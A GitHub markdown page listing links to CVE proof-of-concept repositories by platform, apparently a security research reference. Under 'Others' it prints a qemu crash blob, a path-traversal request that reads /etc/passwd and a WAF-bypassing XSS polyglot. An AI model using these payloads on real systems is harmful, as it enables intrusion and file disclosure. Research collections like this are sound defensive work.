Skip to content

Latest commit

 

History

History
210 lines (172 loc) · 20.6 KB

CVEsPoCs.md

File metadata and controls

210 lines (172 loc) · 20.6 KB

CVEs and PoCs Resources

Genereal

Some CVEs PoCs repos on github or internet.

  • First, see: Awesome CVE PoC by qazbnm456.
  • To search (without PoCs): cve-search you can use it off-line too.
  • This is a nice Wrapper:vFeed.
  • Automated Generation of Proofs of Vulnerability with S2E
  • SecurityExploits: This repository contains proof-of-concept exploits developed by the Semmle Security Research Team. We always disclose security vulnerabilities responsibly, so this repository only contains exploits for vulnerabilities which have already been fixed and publicly disclosed.

Linux

Solaris

  • Kernel Level Privilege Escalation in Oracle Solaris: CVE-2018-2892

Windows

macOS/iOS

Android

Java

Apache Struts

BMC

x86

ARM

VirtualBox

PHP

Others

'''bash $ echo H4sICH0mqFkAA3BvYwDbweS/W8LxrMCuK8wbZN85bWh494VhFIwUELoKAIJvFIwAAgAA | base64 -d | gunzip > a && qemu-system-i386 -vga cirrus a '''

GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
  • Web/Javscript/WAF Payload will run in a lot of contexts: Short but lethal. No script tags, thus bypassing a lot of WAF and executes in multiple environments.
javascript:"/*'/*`/*--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Additions

Please, send pull requests for new additions.

Thanks!